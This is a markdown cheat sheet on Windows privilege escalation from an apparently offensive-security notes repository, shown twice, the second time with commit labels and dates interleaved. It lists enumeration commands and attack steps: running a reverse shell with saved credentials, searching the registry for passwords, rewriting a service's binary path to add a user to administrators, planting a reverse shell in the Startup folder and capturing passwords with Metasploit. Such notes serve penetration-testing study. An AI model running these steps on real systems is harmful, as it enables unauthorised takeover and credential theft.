killchain-compendium/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md

# Windows Privilege Escalation

## Links
* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)

## Account Types

* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__

## Enumeration

### Users & Groups
```sh
whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta
```

### Files
* [powershell](../../../../enumeration/windows/powershell.md)

### System
```sh
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```
* Installed software
```sh
wmic product get name,version,vendor
```
* Services
```sh
wmic service list brief | findstr  "Running"
```

## Exploit

### DLL Hijacking
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)

### Unquoted Service Path
* [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)

### Token Impersonation
* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
*  Hot Potato is best before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/potatoes.md)
* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)

### Schedules Tasks
* `schtasks`
* `Autoruns64.exe`

### MSI Elevated Installer
* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)

### Search for Credentials
```sh
cmdkey /list
```
* Use found credentials
```sh
runas /savecred /user:<user> reverse_shell.exe
```
* Keys containing passwords
```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### accesschk64 Permissions
* Check access to files and folders
```sh
accesschk64 -wvu "file.exe"
```
* If permission `SERVICE_CHANGE_CONFIG` is set
```sh
 sc config <service> binpath="net localgroup administrators user /add"
```
* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.

### Startup Application
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`  

### Password Mining
* Set up metasploit
```sh
use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass
```
* Visit site on target
second commit 2021-08-23 01:13:54 +02:00			`# Windows Privilege Escalation`

			`## Links`
			`* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)`
			`* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)`
			`* [JAWS](https://github.com/411Hall/JAWS)`
bump 2021-10-23 02:03:06 +02:00
			`## Account Types`

			`* __Administrator__ local & domain`
			`* __Standard__ local & domain`
			`* __Guest__`
			`* __System__`

			`## Enumeration`

			`### Users & Groups`
			```sh
			`whoami /priv`
			`net users`
			`net users <username>`
			`net localgroup`
			`net localgroup <groupname>`
			`query session`
			`qwinsta`
			```

			`### Files`
			`* [powershell](../../../../enumeration/windows/powershell.md)`

			`### System`
			```sh
			`hostname`
			`systeminfo \| findstr /B /C:"OS Name" /C:"OS Version"`
			```
			`* Installed software`
			```sh
			`wmic product get name,version,vendor`
			```
			`* Services`
			```sh
			`wmic service list brief \| findstr "Running"`
			```

			`## Exploit`

			`### DLL Hijacking`
			`* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)`

			`### Unquoted Service Path`
new stuff 2022-04-14 01:06:16 +02:00			`* [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)`
bump 2021-10-23 02:03:06 +02:00
			`### Token Impersonation`
			* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
			`* Hot Potato is best before Server 2019 and Windows 10 (version 1809)`
			`* [Potatos](../../../../exploit/windows/docs/potatoes.md)`
bump 2022-01-31 18:30:47 +01:00			`* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)`
bump 2021-10-23 02:03:06 +02:00
			`### Schedules Tasks`
			* `schtasks`
			* `Autoruns64.exe`

			`### MSI Elevated Installer`
			`* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)`

			`### Search for Credentials`
			```sh
			`cmdkey /list`
			```
			`* Use found credentials`
			```sh
			`runas /savecred /user:<user> reverse_shell.exe`
			```
			`* Keys containing passwords`
			```
			`reg query HKLM /f password /t REG_SZ /s`
			`reg query HKCU /f password /t REG_SZ /s`
			```
bump 2021-10-31 02:43:24 +02:00
			`### accesschk64 Permissions`
			`* Check access to files and folders`
			```sh
			`accesschk64 -wvu "file.exe"`
			```
			* If permission `SERVICE_CHANGE_CONFIG` is set
			```sh
			`sc config <service> binpath="net localgroup administrators user /add"`
			```
			`* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)`
			* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.

			`### Startup Application`
			* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`

			`### Password Mining`
			`* Set up metasploit`
			```sh
			`use auxiliary/server/capture/http_basic`
			`set srvport 7777`
			`set uripath pass`
			```
			`* Visit site on target`